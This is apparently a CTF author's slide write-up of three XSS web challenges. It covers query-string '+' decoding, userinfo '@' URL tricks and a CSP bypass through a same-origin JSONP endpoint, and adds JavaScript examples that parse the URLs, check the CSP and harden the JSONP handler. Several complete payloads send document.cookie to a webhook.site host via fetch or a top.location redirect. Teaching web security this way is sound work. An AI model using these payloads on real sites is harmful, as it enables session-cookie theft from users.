# Miday Series CTF

#### by legendyang aka yoni13

---

- Miday
- Miday Revenge
- Miday Revenge Revenge
- Some final thoughts

---

# Miday

### Simple XSS

##### should be simple (?)

----

## What happened

----

## Encoding

In a query string, `+` is decoded as a space:

```
+ -> " "
```

So the `+` that was meant to concatenate `document.cookie` onto the URL arrives at the page as a space. The reflected script becomes `` fetch(`https://webhook.site/id-redacted/` document.cookie) ``, which is a JavaScript syntax error, and the script never runs.

Common Wrong Payload:

```
http://miday_ahdnsivs.nicewhite.eu.org:60007/search?search=a%22%3E%3Cscript%3Efetch(`https://webhook.site/id-redacted/`+document.cookie)%3C/script%3E
```

##### Also see: https://www.w3schools.com/tags/ref_urlencode.ASP

----

## Result

![Pasted image](https://hackmd.io/_uploads/Skfc4vvM1g.png)

#### no cookie

----

## Intended Solution

```
http://miday_ahdnsivs.nicewhite.eu.org:60007/search?search=aa%22%3E%3Cscript%3Efetch(`https://webhook.site/id-redacted/${document.cookie}`)%3C/script%3E
```

##### Uses string interpolation: a template literal with `${...}` needs no `+`, so nothing is turned into a space. Percent-encoding the plus as `%2B` would work as well.

----

## Got Cookie

![image](https://hackmd.io/_uploads/rJwW1FPfkl.png)

---

# Miday Revenge

#### the little @

----

## What might be wrong?

----

## Common Wrong Payload

```
http://docs.google.com@http://miday_revenge_aaaaa.nicewhite.eu.org:60005/search?search=aa%22%3E%3Cscript%3Efetch(`https://webhook.site/redacted/${document.cookie}`)%3C/script%3E
```

Everything between `://` and the first `/` is the authority. Here that is `docs.google.com@http:`, so the browser takes `docs.google.com` as the username, `http` as the host, and `//miday_revenge_aaaaa.nicewhite.eu.org:60005/search` as the path. The request never reaches the challenge server.

----

## Results.....

![image](https://hackmd.io/_uploads/Ske9Avwz1g.png)

----

## Intended Solution

```
http://docs.google.com@miday_revenge_aaaaa.nicewhite.eu.org:60005/search?search=aa%22%3E%3Cscript%3Efetch(`https://webhook.site/redacted/${document.cookie}`)%3C/script%3E
```

With the second `http://` removed, `docs.google.com` is only the userinfo part of the URL (the `user:pass@host` syntax); the host the browser actually connects to is `miday_revenge_aaaaa.nicewhite.eu.org:60005`, even though the URL string starts with `docs.google.com`.

![image](https://hackmd.io/_uploads/rJh6JOPMJe.png)

---

# Miday Revenge Revenge

#### That Google CSP is a scam, I mean.

----

# CSP Policies?

![image](https://hackmd.io/_uploads/ryorbODG1x.png)

----

## OK, I see.
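The URL parsing behind both Miday (the `+` that becomes a space) and Miday Revenge (the `@` that turns the first host into a username), as an added example that is not part of the slides. It uses Node's WHATWG `URL` as the parser. The hostnames and payloads are the ones from the slides; `naiveAllowed` is an assumed string-prefix check of the kind the `@` trick defeats, not the challenge's real filter, which the slides do not show.

```javascript
// Added example (not from the slides): how a browser-style URL parser sees the
// Miday and Miday Revenge payloads. Node's built-in WHATWG `URL` is the parser.

// --- Miday: what the page actually receives for `search=` ---

// The "wrong" and "intended" URLs from the slides.
const WRONG_MIDAY =
  "http://miday_ahdnsivs.nicewhite.eu.org:60007/search?search=a%22%3E%3Cscript%3Efetch(`https://webhook.site/id-redacted/`+document.cookie)%3C/script%3E";
const INTENDED_MIDAY =
  "http://miday_ahdnsivs.nicewhite.eu.org:60007/search?search=aa%22%3E%3Cscript%3Efetch(`https://webhook.site/id-redacted/${document.cookie}`)%3C/script%3E";

// Decode the `search` parameter the way a query-string parser does
// (application/x-www-form-urlencoded rules: `+` becomes a space, %XX is decoded).
function decodedSearchParam(url) {
  return new URL(url).searchParams.get("search");
}

// Pull the script body out of the reflected value so it can be checked on its own.
function scriptBody(reflected) {
  const m = /<script>([\s\S]*?)<\/script>/.exec(reflected);
  return m ? m[1] : null;
}

// Parse-only check: `new Function` compiles the source without running it, so
// `fetch` and `document` need not exist here. Returns the SyntaxError message,
// or null when the engine accepts the source.
function syntaxError(src) {
  try {
    new Function(src); // eslint-disable-line no-new-func
    return null;
  } catch (e) {
    return e instanceof SyntaxError ? e.message : String(e);
  }
}

// --- Miday Revenge: where does `user@host` send the browser? ---

const WRONG_REVENGE =
  "http://docs.google.com@http://miday_revenge_aaaaa.nicewhite.eu.org:60005/search?search=x";
const INTENDED_REVENGE =
  "http://docs.google.com@miday_revenge_aaaaa.nicewhite.eu.org:60005/search?search=x";

// What the browser connects to versus what is merely credentials.
function authority(url) {
  const u = new URL(url);
  return { username: u.username, hostname: u.hostname, port: u.port, pathname: u.pathname };
}

// Assumed prefix allowlist (hypothetical, not the challenge's real check): this
// is the shape of check that the userinfo trick gets past.
function naiveAllowed(url) {
  return url.startsWith("http://docs.google.com");
}

// Robust version: parse first, then compare the effective hostname.
function parsedAllowed(url) {
  return new URL(url).hostname === "docs.google.com";
}

// Stand-alone run: print what each payload turns into.
console.log("wrong Miday script error :", syntaxError(scriptBody(decodedSearchParam(WRONG_MIDAY))));
console.log("intended Miday script error :", syntaxError(scriptBody(decodedSearchParam(INTENDED_MIDAY))));
console.log("wrong Revenge authority :", authority(WRONG_REVENGE));
console.log("intended Revenge authority :", authority(INTENDED_REVENGE));
console.log("naive/parsed allowlist on intended Revenge URL :", naiveAllowed(INTENDED_REVENGE), parsedAllowed(INTENDED_REVENGE));
```

Running it shows the wrong Miday payload failing to compile because `+` became a space, the intended one compiling cleanly, the wrong Revenge URL resolving to host `http` with the challenge address pushed into the path, and the intended one passing a prefix check while its real hostname is the challenge server.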
![image](https://hackmd.io/_uploads/SJG_-dPzkx.png)

```
<meta http-equiv="Content-Security-Policy" content="script-src 'self' https://www.google.com; img-src 'self' ; default-src 'self'">
```

----

![image](https://hackmd.io/_uploads/By6mGdvfye.png)

----

![image](https://hackmd.io/_uploads/SJJMQdvzJg.png)

```
https://www.google.com/complete/search?client=chrome&q=123&jsonp=alert(1)//
```

----

### So steal the cookie via Google.com JSONP?

----

# No.

----

## fetch is blocked

![image](https://hackmd.io/_uploads/SkwoX_PGkl.png)

```
"><script src=https://www.google.com/complete/search?client=chrome&q=123&jsonp=fetch(`webhook.site/aa/${document.cookie}`)// ></script>
```

Even if the google.com endpoint echoed this callback back unchanged, the `fetch` inside it is a network request governed by `connect-src`. This policy does not set `connect-src`, so it falls back to `default-src 'self'`, and any request to webhook.site is refused no matter which script issued it.

----

## Bypass Google.com JSONP filter?

----

Maybe, but I'm a noob, so I can't.

----

### Wait

![image](https://hackmd.io/_uploads/B1HNHdwGJe.png)

----

### XSS via JSONP ?

----

# YES

```
"><script src=/api/v1/getnews?callback=top.location=`meow`//></script>">
```

The site's own `/api/v1/getnews` endpoint reflects the `callback` parameter into a JavaScript response. It is same-origin, so `script-src 'self'` allows it as a `<script src>`, and the reflected callback runs. The `//` comments out the JSON that follows. Assigning `top.location` is a navigation, not a fetch, and nothing in this policy restricts navigations, so the cookie leaves in the URL.

![image](https://hackmd.io/_uploads/H1D7UdPGJe.png)

----

## So Intended Solution was...

```
http://miday_revenge_revenge.nicewhite.eu.org:60006/search?search=a%22%3E%3Cscript%20src=/api/v1/getnews?callback=top.location=`https://webhook.site/redacted/${document.cookie}`//%3E%3C/script%3E%22%3E
```

----

# Works

![image](https://hackmd.io/_uploads/HJx28_PG1l.png)

##### Google CSP is a scam XD

---

### My Final Thoughts

----

<p>
Hello, thanks for reading.<br>
I hope all of you had fun && learned something during the event.<br>
Those challenge ideas came from the cool things I've learned while researching cyber security.<br>
(And I didn't expect 'miday' to be that hard XD)
</p>

----

<p>
We fixed a lot of unintended solutions and got DoSed midway through (miday was hosted on my homelab, and it got knocked down 🫠)
</p>

```
bash: fork: retry: Resource temporarily unavailable
```

<p>
And our main machine went OOM (Out Of Memory) during the competition; we had to contact our hoster to reboot it, and immediately set RAM/CPU limits on those docker containers.
</p>

----

## Anyways, it was fun!
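Back to Miday Revenge Revenge: the slides show the policy and the working payload but not the challenge's source. The following is an added example, not the challenge's code: a JSONP handler shaped like `/api/v1/getnews` that reflects `callback` verbatim, a hardened version of the same handler, and a simplified CSP source check that shows why the same-origin script and the google.com script are allowed while a `fetch` to webhook.site is not, and why a `top.location` navigation falls outside this policy. The handler's behaviour, the sample news data and the `FETCH_DIRECTIVES` table are assumptions and simplifications (no wildcard, scheme-only or path matching).

```javascript
// Added example (not the challenge's code): same-origin JSONP under a
// `script-src 'self'` policy, plus the fix.

// Constructed sample data standing in for whatever /api/v1/getnews returns.
const NEWS = [{ title: "constructed sample headline" }];

// Vulnerable: whatever arrives in ?callback= becomes the first bytes of a
// JavaScript response, and <script src=/api/v1/getnews?...> executes it under 'self'.
function jsonpVulnerable(callback) {
  return `${callback}(${JSON.stringify(NEWS)})`;
}

// Hardened: only a dotted JavaScript identifier may be used as the callback.
// Anything containing `=`, backticks, `(` or `//` is refused.
const CALLBACK_RE = /^[A-Za-z_$][\w$]*(\.[A-Za-z_$][\w$]*)*$/;
function jsonpHardened(callback) {
  if (!CALLBACK_RE.test(callback)) {
    throw new Error("invalid JSONP callback name");
  }
  // The leading /**/ is the usual guard against content sniffing tricks; the
  // real endpoint should also send X-Content-Type-Options: nosniff.
  return `/**/${callback}(${JSON.stringify(NEWS)})`;
}

// The policy from the challenge's <meta> tag.
const POLICY =
  "script-src 'self' https://www.google.com; img-src 'self' ; default-src 'self'";

// Directives that fall back to default-src when absent (CSP "fetch directives").
// Simplified table: navigations are not fetch directives and are not covered.
const FETCH_DIRECTIVES = new Set([
  "script-src", "connect-src", "img-src", "style-src",
  "font-src", "frame-src", "media-src", "object-src",
]);

// Split "a b; c d" into { a: [b], c: [d] }.
function parseCsp(policy) {
  const out = {};
  for (const part of policy.split(";")) {
    const tokens = part.trim().split(/\s+/).filter(Boolean);
    if (tokens.length) out[tokens[0]] = tokens.slice(1);
  }
  return out;
}

// Simplified source matching: 'self' matches the page origin, otherwise the
// source expression must equal the request origin exactly.
function cspAllows(policy, directive, requestUrl, pageOrigin) {
  if (!FETCH_DIRECTIVES.has(directive)) return true; // e.g. a top.location navigation
  const csp = parseCsp(policy);
  const sources = csp[directive] ?? csp["default-src"] ?? [];
  const origin = new URL(requestUrl, pageOrigin).origin;
  return sources.some((s) => (s === "'self'" ? origin === pageOrigin : s === origin));
}

// Stand-alone run against the challenge origin.
const PAGE = "http://miday_revenge_revenge.nicewhite.eu.org:60006";
const PAYLOAD = "top.location=`https://webhook.site/redacted/${document.cookie}`//";
console.log("reflected JSONP body:", jsonpVulnerable(PAYLOAD));
console.log("google.com script allowed:", cspAllows(POLICY, "script-src", "https://www.google.com/complete/search?client=chrome&q=123&jsonp=alert(1)//", PAGE));
console.log("same-origin JSONP allowed:", cspAllows(POLICY, "script-src", "/api/v1/getnews?callback=x", PAGE));
console.log("fetch to webhook.site allowed:", cspAllows(POLICY, "connect-src", "https://webhook.site/redacted/", PAGE));
console.log("navigation to webhook.site restricted by CSP:", !cspAllows(POLICY, "navigation", "https://webhook.site/redacted/", PAGE));
```

The reflected body starts with the attacker's statement and the `//` turns the JSON argument into a comment, which is exactly what the `<script src=/api/v1/getnews?callback=...>` tag on the slide executes. The CSP check makes the three facts from the slides explicit: both script sources are allowed, the fetch is not, and the navigation is never consulted against the policy. The hardened handler rejects the payload outright; allowlisting google.com in `script-src` was never the weak point.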